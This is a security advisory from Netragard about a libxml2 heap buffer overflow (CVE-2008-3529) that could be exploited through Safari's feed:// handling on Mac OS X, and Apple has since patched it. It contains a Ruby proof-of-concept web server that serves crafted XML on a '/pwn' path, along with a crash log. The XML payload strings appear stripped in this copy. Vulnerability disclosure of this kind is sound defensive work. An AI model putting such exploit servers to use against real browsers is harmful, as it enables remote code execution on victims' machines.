*************************** NETRAGARD ADVISORY ************************ http://www.netragard.com "The Specialist in Anti- Hacking" [Advisory Summary] --------------------------------------------------------------------------------------------------- Advisory Author : Adriel T. Desautels Researcher : Kevin Finisterre Advisory ID : NETRAGARD-20090622 Product Name : Mac OS X Publication Subscription Product Version : < Safari 3.2.3 Vendor Name : http://www.apple.com Type of Vulnerability : Buffer Overflow Impact : Arbitrary Code Execution Vendor Notified : Yes Patch Released : APPLE-SA-2009-05-12 Discovery Date : 08/2008 [POSTING NOTICE] --------------------------------------------------------------------------------------------------- If you intend to post this advisory on your web-site you must provide a clickable link back to http://www.netragard.com as the contents of this advisory may be updated without notice. [Product Description] --------------------------------------------------------------------------------------------------- Now your favorite web browser is also the fastest on any platform. With page load speeds that outperform every other major browser on the Mac or PC, Safari also introduces a few new features to the mix. Thanks to the built-in RSS reader in Safari, you can scan the latest news, information, and articles from thousands of websites in one simple-to-read, searchable article list that Safari assembles for you. The first browser to feature a built-in RSS reader, Safari is the ideal way to browse the entire web without using a second application. Introduced in Mac OS X v10.5, Publication Subscription is a technology that offers developers a way to subscribe to web feeds from their applications. Web feeds are documents that contain frequently updated information. You can use Publication Subscription to allow your applications to subscribe to podcasts, photocasts, and any other feed-based document. Publication Subscription handles all the feed downloads and updates automatically. Publication Subscription technologies make use of libxml2 in order to parse RSS data. Libxml2 is the XML C parser and toolkit developed for the Gnome project (but usable outside of Gnome), it is free software available under the MIT License. XML itself is a metalanguage used to design markup languages, i.e. text language where semantic and structure are added to the content using extra "markup" information enclosed between angle brackets. [Technical Summary] --------------------------------------------------------------------------------------------------- "The 'libxml' library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary within the context of an application using the affected library. Failed exploit attempts will result in a denial-of-service vulnerability." -- http://www.securityfocus.com/bid/31126 Safari uses the vulnerable libxml library and can be attacked via the feed:// input vector. [Technical Details] ---------------------------------------------------------------------------------------------------- Libxml2 is vulnerable to a heap-based buffer overflow, caused by improper bounds checking in the xmlParseAttValueComplex() function. By parsing exceedingly long XML entity names using Libxml2, a remote attacker can overflow a buffer and execute arbitrary code on the system. If code execution fails a Denial of Service condition may happen. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529 https://bugzilla.redhat.com/show_bug.cgi?id=461015 http://rhn.redhat.com/errata/RHBA-2008-0878.html https://bugzilla.redhat.com/show_bug.cgi?id=460396 [Proof Of Concept] --------------------------------------------------------------------------------------------------- The following testcases allowed for the creation of the below PoC https://bugzilla.redhat.com/attachment.cgi?id=315476 https://bugzilla.redhat.com/attachment.cgi?id=315477 https://bugzilla.redhat.com/attachment.cgi?id=315478 https://bugzilla.redhat.com/attachment.cgi?id=315479 https://bugzilla.redhat.com/attachment.cgi?id=315480 https://bugzilla.redhat.com/attachment.cgi?id=315481 https://bugzilla.redhat.com/attachment.cgi?id=315482 #!/usr/bin/ruby # # The application PubSubAgent quit unexpectedly. # # Process: PubSubAgent [3764] # Path: /System/Library/Frameworks/PubSub.framework/ Versions/A/Resources/PubSubAgent.app/Contents/MacOS/PubSubAgent # Identifier: PubSubAgent # Version: ??? (???) # Code Type: X86 (Native) # Parent Process: launchd [282] # # Date/Time: 2008-10-31 15:31:41.355 -0400 # OS Version: Mac OS X 10.5.5 (9F33) # Report Version: 6 # # Exception Type: EXC_BAD_ACCESS (SIGSEGV) # Exception Codes: KERN_INVALID_ADDRESS at 0x0000000005050500 # # Thread 0 crashed with X86 Thread State (32-bit): # eax: 0x41414141 ebx: 0x94580535 ecx: 0x00136150 edx: 0x05050500 # edi: 0x00007000 esi: 0x00100000 ebp: 0xbfffe298 esp: 0xbfffe220 # ss: 0x0000001f efl: 0x00010206 eip: 0x94580605 cs: 0x00000017 # ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037 # cr2: 0x05050500 require 'webrick' include WEBrick XML_LOVE = '' + "\n" + '' + "\n" + ' ]>' + "\n" + 'text' + "\n" REDIR_LOVE = '' s = HTTPServer.new( :Port => 80 ) class REDIRECT < HTTPServlet::AbstractServlet def do_GET(req, res) res.body = REDIR_LOVE res['Content-Type'] = "text/html" end end class XMLLOVER < HTTPServlet::AbstractServlet def do_GET(req, res) res.body = XML_LOVE res['Content-Type'] = "text/xml" end end s.mount("/", REDIRECT) s.mount("/pwn", XMLLOVER) trap("INT"){ s.shutdown } s.start [Fix] --------------------------------------------------------------------------------------------------- https://bugzilla.redhat.com/attachment.cgi?id=315291 http://lists.apple.com/archives/security-announce/2009/May/msg00000.html [Vendor Status] --------------------------------------------------------------------------------------------------- Vendor Notified [Vendor Comments] --------------------------------------------------------------------------------------------------- Safari 3.2.3 is now available and addresses the following: libxml CVE-ID: CVE-2008-3529 Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A heap buffer overflow exists in libxml's handling of long entity names. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. Safari 3.2.3 is included in the Mac OS X v10.5.7 update. Safari 3.2.3 on Mac OS X requires either Mac OS X v10.5.7, or Mac OS X v10.4.11 with Security Update 2009-002 installed. [Disclaimer] --------------------------------------------------------------------------------------------------- Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business.